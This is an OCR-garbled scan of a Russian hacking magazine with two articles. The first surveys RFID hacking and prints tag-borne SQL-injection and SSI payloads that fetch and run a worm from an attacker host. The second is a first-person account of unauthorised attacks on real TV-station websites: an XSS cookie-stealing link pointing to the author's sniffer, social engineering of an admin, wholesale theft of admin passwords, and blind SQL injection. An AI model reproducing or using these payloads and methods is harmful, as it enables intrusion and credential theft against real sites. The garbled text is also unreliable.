ПАСНОСТИ ОБ УГРОЗАХ, КОТОРЫЕ ТАИТ В СЕБЕ СЛАБАЯ ЗАЩИЩЕННОСТЬ СИСТЕМ, ИСПОЛЬЗУЮЩИХ ВЕЮ. ЭТА СТАТЬЯ 
РАССКАЖЕТ ТЕБЕ О НОВОМ НАПРАВЛЕНИИ ХАКИНГА — ОБ ВЕЮ-ХАКЕ. 

ОПИСАНИЕ И СЛАБОСТИ ТЕХНОЛОГИИ РАДИОЧАСТОТНОЙ ИДЕНТИФИКАЦИИ 



ачать повествование я решил с 
краткого описания технологии 
ВЕЮ. Вообще, ВЕЮ или Васііо 
Ргецііепсу ЮепІіЛсаІіоп (радиочастотная иден- 
тификация) — это метод удаленного хранения 
и получения информации путем передачи ра- 
диосигналов с помощью устройств, называе- 
мых ВРЮ-метками. История появления данной 
технологии восходит к первой половине XX 
столетия. Британские ВВС еще в начале Вто- 
рой мировой использовали подобную техноло- 
гию, устанавливая на самолеты устройства ра- 
диочастотной идентификации, позволяющие 
эффективно отличать свои авиационные юни- 
ты от самолетов противника. Есть также сведе- 
ния, что в СССР в 50-х годах похожая техноло- 
гия использовалась для шпионажа. С 60-х 
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годов начинаются исследования о возможнос- 
ти применения РЕЮ в гражданских целях, а 
первая радиометка, аналогичная применяе- 
мым сегодня, была создана в научной лабора- 
тории Лос Апамос в 1 973 году. 

Принцип работы ВРЮ-систем весьма прост. 
Данные системы включают в себя два основ- 
ных компонента: считыватель (ридер) и иден- 
тификатор (метка, чип, тэг). Ридер излучает 
электромагнитную энергию. Метка улавливает 
этот сигнал и передает ответный, который уже 
принимается антенной ридера. 

По своему типу системы РЕЮ подразделяются 
на пассивные и интерактивные. В пассивной 
системе излучение считывателя находится 
постоянно во времени (то есть не модулирова- 
но) и служит только источником питания для 



радиометки, которая собственного источника 
энергии не имеет. Получив энергию от ридера, 
метка включается и передает сигнал, который 
принимается считывателем. Вышеописанным 
способом работает большинство систем уп- 
равления доступом, где необходимо только по- 
лучить серийный номер идентификатора. 
Более продвинутые РРЮ-системы используют 
интерактивный режим работы. Ридер в таких 
системах излучает модулированные колеба- 
ния, то есть формирует запрос. ВЕЮ-метка де- 
шифрирует запрос, обрабатывает его, и, если 
это необходимо, формирует соответствующий 
ответ. Подобные системы необходимы, напри- 
мер, для работы с товарами, маркированными 
радиометками. Дело в том, что если система 
пассивная, то при попадании одновременно 
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нескольких меток под излучение ридера их 
сигналы накладываются друг на друга, и воз- 
никает коллизия. Интерактивные же системы 
снабжены механизмом антиколлизии. Интер- 
активные ЯРЮ-тэги часто имеют встроенную 
батарею, заряда которой может хватить на не- 
сколько лет. Интерактивные метки с собствен- 
ным источником питания называют активными, 
а те, что без него, — полупассивными. 
ЯРЮ-метки можно подразделить на несколько 
категорий. Во-первых, по используемому диа- 
пазону радиочастот на: 

• низкочастотные (125 или 134,2 КГц); 

• высокочастотные (13,56 МГц); 

• ИНГ, то есть ультравысокочастотные 
(868-956 МГц); 

• микроволновые (2,45 ГГц). 

Во-вторых, по размерам встроенной памяти, 
которая может быть от 4 байт до 4 Кб. Кроме 
того, метка может иметь память только для чте- 
ния или же с возможностью дозаписи и пере- 
записи информации. Существует несколько 
стандартов ЯРЮ-меток, сформировавшихся 
на сегодняшний день. Важным свойством ра- 
диометки является и ее размер, который может 
составлять всего 0.4x0. 4 мм для пассивных ме- 
ток, в то время как активные метки имеют раз- 
мер с монету. 

О Применение: за и против 

Применяться ЯРЮ может в самых разных об- 
ластях. Во-первых, СКУД, то есть системы 
контроля и управления доступом. Истори- 
чески это было первым применением техно- 
логии ЯРЮ. Сегодня доступ в офис или дом с 
помощью ргохітііу-карты со встроенным ра- 
диочипом — уже вполне обычное дело. Боль- 
шинство подобных систем используют пас- 
сивные метки и работают в низкочастотном 
диапазоне, хотя в последнее время все чаще 
встречаются интерактивные системы на час- 
тотах 13,56 МГ ц. Реально новое направление 
в этой области — создание ЯРЮ-имплантатов 
для людей. Первый эксперимент такого рода 
был проведен еще в 1988, а сегодня компа- 
ния Аррііеб 0\д\\а\ Боіиііоп предлагает любому 
желающему имплантировать себе в руку свою 
разработку — ѴегіСбір. 

Во-вторых, это контроль над перевозкой гру- 
зов и конкретных товаров, их складской учет. 
Представь только, как просто будет прохо- 
дить ревизия на складах или в супермаркетах: 
достаточно пройтись с ридером вдоль полок 
с товарами — и все автоматически будет пе- 
реучтено в БД товаров. Существует стандарт 
ЯРЮ, называемый ЕРС (еіесігопіс ргобисі 
собе), являющийся аналогом штрихкодов. 



Специалисты считают, что в ближайшее де- 
сятилетие ЯРЮ-метка на каждом отдельном 
товаре станет таким же обычным явлением, 
как сегодня штрихкод. 

Еще одна очень важная область применения 
ЯРЮ — это электронные документы. Госу- 
дарства многих стран, в том числе и России, 
планируют уже в самое ближайшее время на- 
чать встраивать ЯРЮ-метки в паспорта своих 
граждан. При этом в память имплантирован- 
ной в паспорт метки будут заноситься не тол ь- 
ко обычные данные владел ьца (ФИО, год рож- 
дения и т.д.), но и биометрические признаки. 
Как это всегда бывает, у технологии, подоб- 
ной ЯРЮ, появляется множество сторонни- 
ков и противников. Несмотря на все удобства, 
привносимые изменением ЯРЮ, у многих лю- 
дей ее внедрение вызывает большие опасе- 
ния. И не зря. Во-первых, радиометки по своей 
сути являются радиомаяками — ведь именно 
в этом качестве их использовала советская 
разведка в 50-х. И незаконное слежение еще 
не единственное, что вызывает опасения. 
Большие опасения вызывает безопасность 
самой технологии. Сам Брюс Шнайер по пово- 
ду планов оснащения паспортов ЯРЮ-метка- 
ми заявил, что «это чистая угроза националь- 
ной безопасности». 

Конечно, такую важную технологию, как ЯРЮ, 
не могли оставить без внимания хакеры и раз- 
личные исследователи информационной бе- 
зопасности. Первое, на чем хотелось бы заос- 
трить внимание, — это проблема, связанная 
с вмешательством в личную жизнь человека, 
которая, возможно, будет иметь место в са- 
мом обозримом будущем. Только представь, 
что государство или же крупные корпорации 
будут иметь под контролем тысячи считывате- 
лей радиометок, расположенных на входе в 
метро, супермаркет или просто посреди улиц. 
Такие считыватели способны накапливать 
информацию о нашем перемещении, о том, 
какие товары мы только что приобрели в ма- 
газине. Конечно, сегодня это звучит несколь- 
ко бредово, но пройдет, возможно, менее де- 
сятка лет, и наступит время, когда каждый из 
нас добровольно или же принудительно будет 
всегда носить с собой имплантированный под 
кожу идентификационный чип. Напоминает 
кино в жанре киберпанк? Как бы то ни было, 
все идет именно к этому. 

□ КГЮ и хакеры 

Австралийские исследователи компьютерной 
безопасности в апреле этого года опубликовали 
работу, в которой описывается возможность пре- 
пятствования считыванию информации ЯРЮ- 



ридером с метки. В их планах — создание уст- 
ройства, которое не позволит считывать 
информацию с ЯРЮ-меток без ведома их вла- 
дельца. Они использовали метод, напоминаю- 
щий Эо8-атаку: радиоэфир захламляется ог- 
ромным множеством сигналов, имитирующих 
сигналы меток. ЯРЮ-ридеры первого поколе- 
ния, то есть пассивные, не имеют возможности 
считать данные с карты из-за вышеупомянутого 
явления — коллизии. Интересно, что более про- 
двинутые интерактивные ридеры, как показали 
опыты, также напрочь уходят в даун. 

Но с созданием первого анти-ЯРЮ гаджета авс- 
тралийцев опередили голландцы. В начале ап- 
реля на околокомпьютерных сайтах запестрила 
новость о разработанном сотрудниками Сво- 
бодного университета Амстердама устройства, 
которое препятствует чтению ЯРЮ-меток и ин- 
формирует владельца о подобных попытках. 
Данный девайс разрабатывался в рамках про- 
екта ЯРЮ Оиагсііап (ИДрѴ/ѵѵѵѵѵѵ.гІісІдиагсІіап.огд) 
группой исследователей под руководством 
профессора Эндрю Таненбаума (Апбгеѵѵ 
ТапепЬаит), который, кроме этого, занимается 
еще рядом проектов, посвященных безопас- 
ности ЯРЮ-систем. Разработанное голландца- 
ми устройство представляет собой КПК с 
550МН2 процессором и 64 Мб памяти, оборудо- 
ванный ЯРЮ-ридером и необходимым ПО. 
РІастоящие хакеры смотрели на проблему 
несколько иначе. Двое немецких компью- 
терщиков МіпіМе и Маба]іѵапа, состоящие в 
рядах «Хаоса», решили, что лучший способ 
обезопасить себя от угроз, которые может 
принести технология ЯРЮ, — это простое 
уничтожение ЯРЮ-меток. Наиболее дейс- 
твенным способом убийства радиометок, 
обнаруженными хакерами, оказалось поме- 
щение их на короткое время в микроволнов- 
ку. Но далеко не любой предмет со встроен- 
ным ЯРЮ-чипом засунешь в микроволновую 
печь, поэтому был разработан девайс, на- 
званный ЯРЮ-2аррег. Создатели устройства 
решили, что стоимость его должна быть ми- 
нимальна, поэтому использовали в качестве 
основы одноразовый фотоаппарат-мыльни- 
цу, который сможет раздобыть любой жела- 
ющий. После некоторых усовершенствова- 
ний вспышка такого фотоаппарата 
научилась создавать сильное электромаг- 
нитное поле, наповал убивающее пассивные 
радиометки. Правда, пока только 13,56-ме- 
гагерцовые, но создатели 2аррег'а обещают 
дальнейшее развитие проекта. ЯРЮ-2аррег 
вызвал у всех большой интерес на состояв- 
шемся некоторое время назад европейском 
22-м слете хакеров ССС. 
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О Клонирование 

Кстати, пресса, сама того не подозревая, 
привлекает все больше хакеров к изучению 
ЯРЮ. Наибольшую шумиху среди техногиков 
вызвала недавняя статья американской жур- 
налистки Эннели Ньютц (Аппаіее Ыеѵѵііг) под 
названием «Тбе ВРЮ Наскіпд ІІпбегдгоипсІ», 
опубликованная в майском выпуске ѴѴігеб 
(ѵѵѵѵѵѵ.ѵѵігесІ.сот/\А/ігесІ/агсІпіѵе/14.05/гІісІ. ЫтП . 
Впервые о ВРЮ-хаке говорилось как о новом 
направлении хакерства. Одним из «героев» 
этой статьи стал 23-летний студент Джонатан 
Вестхьюз фопаіітап ѴѴезіІтиез) — возможно, 
первый из хакеров, сконструировавший уст- 
ройство, способное клонировать ВРЮ-метки. 
Это устройство, прозванное им ргохтагк, 
впервые было собрано Джонатаном еще в 
2003 году. С помощью ргохтагк'а, который 
легко умещался в кармане, Вестхьюз мог, 
приблизившись на достаточно близкое к че- 
ловеку расстояние, незаметно клонировать, 
имеющуюся у того ргохітііу-карту, и получить 
таким образом доступ туда, где его явно быть 
не должно. 

На протяжении всего этого времени Джона- 
тан совершенствовал ргохтагк, и устройс- 
тво уже получило третье рождение в виде 
ргохтагкЗ. Теперь оно обрело множество 
новых функций и умеет работать уже с 
большинством 125КН2 и некоторыми 
13.56МН2 ЯРЮ-метками. Не так давно хаке- 
ру удалось клонировать даже ѴегіСІтір, ко- 
торый его производители преподносят как 
наиболее надежный способ уберечь дан- 
ные, касающиеся идентификации пользо- 
вателя. На состоявшейся этим летом кон- 
ференции НОРЕ (Наскегз Оп РІапеі ЕаіТІт) 
ЫитЬег 8іх Вестхьюз продемонстрировал, 
чего на самом деле стоит разрекламиро- 
ванный ѴегіСЬір. Не обошлось там и без 
участия Эннели, которая, вероятно, чтобы 



привлечь большее внимание к данному ме- 
роприятию, ассистировала Джонатану с 
имплантированным в руку ѴегіСМр'ом. 
Судя по тому, сколько сообщений об этом 
«взломе» появилось в инете, представле- 
ние им удалось;). 

Если тебя заинтересовал девайс Вестхью- 
за, то тебе необходимо посетить его сайт: 
ИДр://сд.сх . Там ты найдешь все наработки 
Джонатана по конструированию ЯРЮ-кло- 
неров и даже сможешь скачать архивчик со 
всеми схемами, описаниями и ПО, необхо- 
димыми для конструирования ргохтагкЗ. 
Конечно, клонировать интерактивную ЯРЮ- 
метку — задача сложная, поэтому, думаю, в 
скором времени системы идентификации с 
пассивными метками уйдут в прошлое. Пре- 
имущество интерактивных систем, помимо 
всего прочего, — это возможность исполь- 
зования шифрования для защиты инфор- 
мации. Ріа самом деле такие системы уже 
давно не редкость — к примеру, автомо- 
бильные иммобилайзеры, набирающие все 
большую популярность, или те карты, что 
используются в московском метрополитене 
еще с 1998 года. Подобную систему ис- 
пользовала компания ЕххопМоЬіІ с 
1997 года. 

О Проблемы шифрования 

ЕххопМоЬіІ — крупнейшая нефтяная корпора- 
ция, владеющая сетью бензозаправочных 
станций в США. Она внедрила на своих запра- 
вочных станциях инновационную платежную 
систему ЗреесІРазз: оплата осуществлялась 
с помощью брелока с ЯРЮ-чипом внутри, на 
котором записаны данные о платежном счете 
его владельца в системе ЗреесІРазз. Трое ис- 
следователей компьютерной безопасности 
— Стив Боно (Зіеѵе Вопо), Мэтью Грин 
(МаііЬеѵѵ Огееп) и Адам Стаблфилд (Абат 



ЗІиЬЫеІіеІб) — конкретно взялись за изуче- 
ние этой системы. ЯРЮ-чипы, использовав- 
шиеся в этой системе, представляли собой 
разработку Техаз Іпзігитепіз под названи- 
ем ЭідііаІ Зідпаіиге Тгапзропбег (ЭЗТ). 

ЭЗТ — это полупассивная радиометка с 
системой 40-битного шифрования. Хотя 
40-битное шифрование сегодня достаточно 
легко вскрывается брутфорсом. Сложность 
вскрытия ключа заключалась в том, что сам 
алгоритм шифрования взломщикам был не- 
известен. Но парням удалось восстановить 
его, используя различные криптоаналити- 
ческие методы. Затем они собрали мощный 
кластер, который смог расшифровывать по 
5 ключей менее чем за 2 часа. Позже было 
сконструировано устройство, эмулирую- 
щее работу ЭЗТ, которое было проверено в 
действии на одной из станций ЕххопМоЬіІ. 
После того как представители ЕххопМоЬіІ 
ознакомились с результатами этого иссле- 
дования ( ИДрѴ/гіібапаІѵзіз.ога ). они заявили 
в прессе, что на практике все это не реали- 
зуемо, так как испытание «лабораторное». 
Но компания все же решила перестрахо- 
ваться и перейти на чипы с 128-битным 
шифрованием. 

Посмотрим, как обстоит дело с криптоза- 
щитой электронных документов. Нидер- 
ландские спецы по информационной безо- 
пасности из фирмы Яізсиге первыми 
взломали прототип электронного паспорта, 
который собираются вводить в Евросоюзе. 
Удалось им это вследствие достаточно про- 
стого алгоритма, примененного для шиф- 
рования личных данных владельца. Такая 
информация, как день рождения владельца 
паспорта, серийный номер, срок окончания 
его действия, легко предсказуема и помог- 
ла «взломщикам» расшифровать осталь- 
ное содержимое памяти радиометки. 
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вания информации с радиометок 



Окончательно добил все представления о 
самой возможности безопасной ЯРЮ из- 
вестнейший криптолог, профессор инсти- 
тута Вейсмана Ади Шамир (Асіі ЗНатіг). Ис- 
следования ученый проводил на 
ЯРЮ-метках стандарта ЕРС (один из наибо- 
лее перспективных стандартов на сегод- 
няшний день), работающих в ШР- диапазо- 
не частот и использующих 8-ми и 32-битное 
шифрование данных. Для подбора ключа 
использовалась направленная антенна и 
цифровой осциллограф. Выяснилось, что 
при посылке чипу неверного бита ключа 
шифра энергопотребление ЯРЮ-чипа не- 
сколько возрастает, что может быть зафик- 
сировано несложной аппаратурой. Таким 
образом, возможен взлом даже достаточно 



длинных ключей, причем в весьма короткое 
время. И это уже не проблема шифрования, 
а скорее проблема недоработки самой тех- 
нологии ЯРЮ. Шамир представил также ин- 
тересную идею о возможности создания 
девайса для расшифровки данных с ШР 
ЯРЮ-тэгов из обычного мобильника путем 
замены его ПО. Ведь ОЗМ-мобилы и ІІНР- 
радиометки могут работать в одних и тех же 
частотах. Буду с нетерпением ждать, что по- 
лучится из этой затеи. 

О Подмена содержимого памяти 
ВГЮ-меток 

Не спасает шифрование паспортов и от их 
клонирования. Назавершившейся недавно 
хакерской конференции Оеісоп немецкий 



эксперт инфосека Лукас Г рюнвальд (І_иказ 
ОгипѵѵаІсІ) продемонстрировал, как содер- 
жимое электронного паспорта может быть 
легко перенесено на любую другую радио- 
метку. При этом Лукас использовал разра- 
ботанную вместе с его коллегой Борисом 
Вольфом (Вогіз ѴѴоІТ) еще пару лет назад 
прогу ЯРОитр, которая умеет считывать, 
редактировать, записывать (если это воз- 
можно) данные ЯРЮ-меток. Первой верси- 
ей данной проги был простенький 
регі-скрипт, теперь же ЯРОитр представ- 
ляет собой удобную тулзу, распространяю- 
щуюся под лицензией ѲРІ_. Существуют 
пока только версии для пингвина. Для ра- 
боты проги необходим ЯРЮ-ридер АСО 
МиШ-Тад Яеасіег или ему подобный. Грюн- 
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ВШИаЗВІ 

>Всем начинающим 
ЯРЮ-хакерам: помните 
про существование 
УК РФ. 




>Сегодня куязвимос- 
тям технологии ЯРЮ, 
кроме хакеров и иссле- 
дователей компью- 
терной безопасности, 
проявляют интерес и 
представители крими- 
нального мира: разного 
родамошенники, авто- 
угонщики, террористы. 
Пытаясь привлечь 
внимание копаснос- 
тям, скрывающимся в 
использовании этой 
прогрессивной тех- 
нологии, хакеры даже 
продемонстрировали 
возможность исполь- 
зования ЯРЮ-сканера 
в качестве детонатора 
взрывного устройс- 
тва, реагирующего 
на метку, встроенную 
в паспорт человека, 
которого необходимо 
ликвидировать. 
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> Процесс клонирования ргохітііу-карты 



вальд вносит в софтину время от времени кое-какие 
поправки. РІапример, сейчас она позволяет задейство- 
вать в метке счетчик считываний (функция соокіе), 
планируется введение возможности снятия шифрова- 
ния данных меток с помощью брутфорса или атаки по 
словарю, а также проверка на ключи, выставляемые 
«по умолчанию». Скачать ПРОиппр можно на сайте раз- 
работчиков: ѵѵѵѵѵѵ.іТ-сІитр.ога . 

После создания своей проги Лукас и Борис занялись 
активным изучением возможности взлома различных 
РРЮ-систем. Первым делом они изучили ВРЮ-систему 
местного университетского кафе, где данные о сумме 
на счете клиента хранились прямо на карточке. Пита- 
ние там стало для них бесплатным:). Дальше — боль- 
ше: они останавливались в гостиницах и отелях, в ко- 
торых для входа в номер использовались 
ргохітііу-карты. Интересный факт: ни одна из десяти 
изученных ими РРЮ-систем не имела шифрования, и 
Грюнвальд после изучения 2-3 карт мог создать мас- 
тер-карту, открывающую любую дверь. Ріо и системы с 
шифрованием было очень просто обойти: либо ключ 
подбирался простым перебором, либо выставлялся 
производителем по умолчанию. Уязвимыми оказались 
и системы супермаркетов, где начали применять РРЮ 
как альтернативу штрихкодам. Хакеры получили воз- 
можность с помощью карманных компьютеров поме- 
нять метки дорогостоящих товаров на менее дорогие, 
«спасая» таким образом свою наличность. По словам 
Грюнвальда, 3/4 всех изученных им РРЮ-систем ока- 
зались так или иначе уязвимы. 

□ Атаки через ПГЮ-метки 

Ріо несанкционированное чтение и клонирование ме- 
ток — это еще не все. Редактирование содержимого 
РРЮ-метки может позволить злоумышленнику осу- 
ществить самые разнообразные атаки на компьюте- 



ры, работающие с РРЮ. Уязвимыми местами 
РРЮ-систем могут стать базы данных, которые могут 
быть подвержены зці-инъекциям; ѵѵеЬ-интерфейсы — 
здесь возможны различные виды внедрения вредо- 
носного кода; не исключена возможность атак типа 
ЬиІІег оѵеіТІоѵѵ. 

РІаиболее просто реализуема атака типа зрі-іщесііоп. 
Допустим, приложение, работающее с РРЮ, записы- 
вает на метку какую-то информацию, например, если 
это коробка с товаром, говорящая о ее содержимом 
— «Ьеег». Вот пример атаки на ѵѵіп-систему, уязвимую 
к ЗЦІ-ІПІ : хакер изменяет значение тэга на «Ьеег 1 ; ЕХЕС 
Мазіег.. хр_стсІзРіеІ I сбМ/ѴіпсІоѵѵзѴГетр & Шр -і <здесь 
ір> (ЗЕТ ѵѵогт. ехе & ѵѵогт. ехе;» и загружает (конеч- 
но, если машина подключена к инету) червя в систему 
с БД товаров при считывании информации с метки. 
Аналогично происходят атаки на системы, имеющие 
интерфейс, основанный на веб-компонентах. К при- 
меру, внедрение через метку кода «<!-#ехес 
стсІ="\л/деі ИПр://ір/ѵѵогт-0/ітр /ѵѵогт :сбтосІ+х/ітр/ 
уѵогт:/1тр/ ѵѵогт»->» в уязвимую Ііпих-систему с 581 
повторяет вышеописанную атаку на винду. Как ты уже 
понял, эти атаки практически ничем не отличаются от 
аналогичных атак на сайты в инете. 

Еще пример. Допустим, в ВРЮ-системе используют- 
ся только метки с объемом памяти 128 байт. Про- 
граммист, писавший приложение, обрабатывающее 
содержимое тэгов, поленился сделать проверку на 
длину этого самого содержимого. В итоге имеется 
возможность для переполнения буфера, ведь хит- 
рый хакер может подсунуть системе метку с боль- 
шим количеством памяти, чем 1 28 байт, внедрив туда 
и шелл-код. 

Вышеприведенные сценарии атак я позаимствовал 
на сайте ѵѵѵѵѵѵ.іТісІѵігиз.ога . Там выкладываются ре- 
зультаты исследований уже упомянутой в статье 



ХАКЕР 10/94/06 






взлом 



» 




> Эта забавная радиометка на самом деле карика- 
тура от противников 




> Начинка ргохплагкЗ 



группы ученых во главе с профессором 
Э. Таненбаумом. Главной целью их иссле- 
дований было создание вируса, распро- 
страняющегося через ЯРЮ. И им это уда- 
лось: первый концептуальный вирус, не 
получивший названия, был создан в лабо- 
ратории амстердамского университета. 
Вирус распространяется через ЯРЮ-мет- 



ки и заражает БД систем, использующих 
ЯРЮ. 

Конечно, далеко не все ЯРЮ-системы под- 
вержены подобного рода атакам. Таненба- 
ум в своих исследованиях использовал не 
конкретную реализацию какой-то ЯРЮ-сис- 
темы, а созданную для опытов лаборатор- 
ную модель с модульной архитектурой, поз- 



воляющей изучать возможность атак на 
различные БД, задействованные в реаль- 
ных системах. И хотя производители 
ЯРЮ-систем подвергли критике исследова- 
ния голландцев, думаю, с повсеместным 
распространением подобных систем ока- 
жется, что немалая их часть будет уязвима к 
разного рода хакерским атакам. ПЕ 
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Л Е КСАНДР «ЬОМОЕРІ» НИКОЛ Е Н КО 



ТОТАЛЬНЫЙ 
ДЕСТРОЙ ТѴ 
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ТЫ НИКОГДА НЕ МЕЧТАЛ ЗАХВАТИТЬ САЙТЫ ТѴ И ПИСАТЬ СВОИ НОВОСТИ ИЛИ ИЗМЕНЯТЬ ИХ ПО СВОЕМУ УСМОТРЕНИЮ? 
НИ ДЛЯ КОГО НЕ СЕКРЕТ, ЧТО НЕТ ИДЕАЛЬНО ЗАЩИЩЕННЫХ СИСТЕМ. ЧТОБЫ УБЕДИТЬ В ЭТОМ ОСТАЛЬНЫХ, Я СТАЛ ТЕС- 
ТИРОВАТЬ САЙТЫ ТѴ ОДНОГО КРУПНОГО ГОРОДА. ЧТО ПОКАЗАЛ МОЙ НЕОФИЦИАЛЬНЫЙ АУДИТ, ТЫ СЕЙЧАС УЗНАЕШЬ... 

ХАРДКОРНЫЙ ВЗЛОМ ПОПУЛЯРНЫХ ТЕЛЕКОМПАНИЙ 




яя начала я расскажу, как мне пришла в голову мысль 
проверить на прочность официальные сайты ТѴ отде- 
льно взятого города-миллионника. Во время ужина я 
врубил телик и клацал по каналам. На одном из них шел анонс утре- 
нней передачи. В ней говорилось про электронные деньги пример- 
но следующее: «Мы расскажем вам про деньги, которые нельзя 
порвать, вы их не потеряете, и у вас их НЕ УКРАДУТ...» Последнее 
слово меня удивило и возмутило:). Я написал на форуме пример- 
но такой пост: «Кто вам сказал, что нельзя украсть электронные 
деньги?». Ответом был следующий отмаз: «Имелось в виду, путем 
залезания в карман». Через пару дней за завтраком на том же ка- 
нале меня насмешили еще раз, опять при анонсе. В этот раз в пере- 
даче для геймеров прозвучала фраза: «Игра — это занимательный 
софт для юных компьютерных талантов (или гениев)». Писать жур- 
налюгам на форум я не стал, а просто решил проверить их сайт на 
прочность. Азаодно и ресурсы остальныхтелеканалов. 

4-й канал 

После завтрака я приступил к изучению первого сайта: 
ѵѵѵѵѵѵ.сІпаппеІ4.ги . Движок сайта был полностью написан на перле. 
Внешне портал был оформлен в синих тонах, на главной страни- 
це красовались новости, опросы, погода и т.д. Немного побро- 
див по ресурсу и не найдя дырок, я приступил к изучению форума 
ѵѵѵѵѵѵ.сНаппеІ4.ги/саі/4гоот/ . Это был движок, написанный также 
на перле, с полностью убранными копирайтами. Проверяя каж- 



дую ссылку, содержащую параметры, я нашел ХЗЗ: 



ѵѵѵѵѵ.сЬаппеІ4.ги/сді/4гоот/4гоот.рІ?ЬоагЦ=ехргез5;асііоп=сІізрІау;пит=<зсгір1:> 



ІеіТ()</зсгірі>. 



Далее я залил наудаленный хост снифер, состоящий из 2-х фай- 
лов: зЫЦз и зпіТ.рГір (их исходники смотри на ЭѴЭ). После чего со- 
ставил линк для атаки: 



^уѵѵѵ.сЬаппеІ4.ги/сді/4гоот/4гоот.рІ?ЬоагЦ=ехрге55;асІіоп=сІІ5рІау;п и т=<зсгір! 



гс=НІр://х5ІІе.ги/5ЬіД5></зсгір1> 



Решив протестить хакерскую систему, я обломался: видимо, что-то 
где-то фильтровалось. Заглянув в исходник НТМІ_-страницы, я уви- 
дел, что фильтруется знак равенства. Немного подумав, я заменил = 
на%30(код « = »). Проверив ссылку повторно, я получил свои куки на 
мыло. Теперь осталось отправить письмо одному из админов. В од- 
ном из тредов на форуме (именно туда я запостил фразу, касаемую 
электронных денег) написал админу РМ следующего содержания: 



«Может, вы еще про поисковики репортаж сделаете: 



[ЦРІ_= ГіДр://ѵѵѵѵѵѵ.сІтаппеІ4.ги/сді/4гоот/4гоот . рІ?ЬоагсІ=ехргезз;ас1:іоп=сІіз- 



рІау;пит=<5СгірІ%205гс%ЗРИир://х5ІІе.ги/5ЫД5></5Сгір1>] Нір://рип1о.ги[/ЦРІ_]?» 



Здесь я указал на реальную тему, в которой писал админ, для того 
чтобы он не заподозрил неладное. Также я специально выбрал поис- 
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ковик, который не так известен, как, например, Яндекс. 
Если ты изучил исходник снифера, то ты наверняка за- 
метил переадресацию в первой строчке на сайт поиско- 
вика. Это я задумал, чтобы также не вызывать никаких 
подозрений у админа. 

Итак, я отправил администратору РМ и стал ждать. 
Через час получил письмо с куками (пате=реррег; 
раззѵѵогб=ууіІ\л/Сі\/ѵЗЕіЬѴ). Исправив их с помощью ре- 
дактора куков в Орега, я стал админом форума. Первым 
делом я зашел в админку форума. Изучив ее, увидел на- 
звание движка — «Ооіб 3». Затем залез на зѳсигііѵІаЬ.ги 
и ввел в строке поиска «ОоІсІ Тэгит». Посмотрев на ре- 
зультатзапроса, яузнал, чтодвижокихфорума — УаВВ. 
Скачав его исходники с другого сайта, я еще раз убе- 
дился в этом. Последняя дыра в форуме была датиро- 
вана 2004 годом. Я начал судорожно рыскать по админ- 
ке в поисках загрузчика файлов или еще чего-нибудь 
полезного, но так и не нашел:(. Тогда принял решение 
пролистать РМ в поисках админки сайта или паролей к 
чему-либо — также обломался. И вот она — первая уда- 
ча! Я зашел в профиль админа и посмотрел на поле с 
паролем. Оно было покрыто звездочками, но что-то мне 
подсказало обратить внимание на исходник паги. Я быс- 
тро нашел поле с паролем, и там был написан пассворд 
в чистом виде. Админ имел право просматривать и из- 
менять чужие профили, поэтому я быстренько вытянул 
связку логин: пароль со всех админских акков. На этом 
я остановился и ушел спать. Утром меня ждала следую- 
щая жертва — сайт канала «Студия 41» ( зЩбіо^І.сот ). 

Студия 41 

Зайдя на сайт, я увидел ссылки на свежие новости, нави- 
гацию по разделам и т. п. Осмотрев внешний вид и офор- 
мление сайта, начал бродить по ресурсу в поисках дыр. 
Высматривал до тех пор, пока не обратил внимание на 
баннер, который раньше почему-то игнорировал. Он меня 
заинтересовал ссылкой ИДр://зШбю-41 .сот/абз/абсііск. 
рГір?п=а4і592аГ Как видно из линка, на портале сущес- 
твует скрипт абсііск. рГір в папке абз. Перейдя по линку 
ГіДр://з1:ибіо-41 .сот/абз/ . я получил приглашение сцена- 
рия рГірАбзІМеѵѵ 2.0.7 ввести логин и пароль. Посмотрев 
в багтраке упоминания о данном движке, я узрел новость, 
посвященную ХЗЗ. Судя по описанию, нужно было иметь 
юзерский доступ к скрипту, после чего становилось ре- 
альным стащить куки администратора. У меня же не было 
никакого доступа, поэтому я отложил этот скрипт до луч- 
ших времен. 

В отчаянии было решено обратиться к Гуглу и изна- 
силовать его запросами вида МуЗС)І_ зі1е:зІибіо-41.сот. 
Введя по очереди несколько подобных запросов, я полу- 
чил кое-что интересное: на сохраненной в хэше странице 
светилась ошибка выполнения запроса МуЗС)І_. Перейдя 
по линку, я увидел, что дыра уже залатана. Но, посмотрев 
нахэшевую страницу, заметил ссылку на скрипт, вызыва- 
ющи й ошибку: /ѵѵеЬ/зіибі о2 / з М:е / ѵѵѵѵѵѵ/і псіибе/ б Ь. 
рГір (по-видимому, в нем содержались функции работы с 
БД). Я решил зайти в папку ГіЦр://зШбіо-41 .сот/іпсіибе/ и. 
как ни странно, увидел ее содержимое (на момент сдачи 



статьи в печать этот каталог был действительно открыт! 
— Прим. ред.). Там я нашел файлик бЬ.іхі. Сначала я по- 
думал, что это исходник 6Ь. рГір, но, открыв его, я увидел 
структуру базы, датированную 2003 годом. Покликав по 
очереди по всем скриптам, получил ошибку 500 (навер- 
ное, не было прав на их выполнение). Надежда на успех 
таяла, пока я не дошел до сценария ѵіеѵѵЭос.рбр. После 
клика по нему появилась ошибка Му80І_. Это был успех, 
поскольку мне оставалось узнать параметр и попробо- 
вать выполнить ЗОЬинжекцию. И тут мне вдруг вспомни- 
лось, что где-то на сайте я уже видел файл с таким именем. 
Быстро найдя его, я попробовал выполнить задуманное, 
но не тут-то было! Ошибки ЗОБ уже не возникало, версия 
на сайте была запатчена админами (видимо, я не первый 
хакер, покусившийся на ресурс). А что касается файла 
/іпсІибе/ѵіеѵѵЭос.рНр, то он реально был бажным. Кстати, 
забыл сказать, что параметр сценария назывался босіб. 
Поэкспериментировав, я понял, что параметр этот не 
фильтруется, и команда ІЛМІОІМ также не работает. Но то, 
что ІИМІОЫ не работает, — не беда, поскольку существует 
метод посимвольного перебора. Сначала я решил прове- 
рить, есть ли у меня доступ к ппузді. изег: 



Ы1р://5ІисІіо-41 ,сот/іпсІисІе/ѵіеѵѵРос.рИр?сІосісІ=1 + АШ+азсіі (зиЬзІгіпд 
((ЗЕІЕСТ+раз5ѵѵогсІ+РРОМ+ту8дІ.5ег+иМІТ+1),1,1))>0 



Но после вышеуказанного запроса выяснилось, что до- 
ступ все же отсутствовал. Здесь стоит сделать остановку 
и пояснить, как работает данный запрос. Я выбрал такое 
значение параметра босіб, которое бы соответствовало 
реальному обращению к БД. В моем случае, если данных 
по запросу не было, то выдавалась пустая страница. Фун- 
кция азсіі (об) возвращает азсіі-код символов об; зиЬзігіпд 
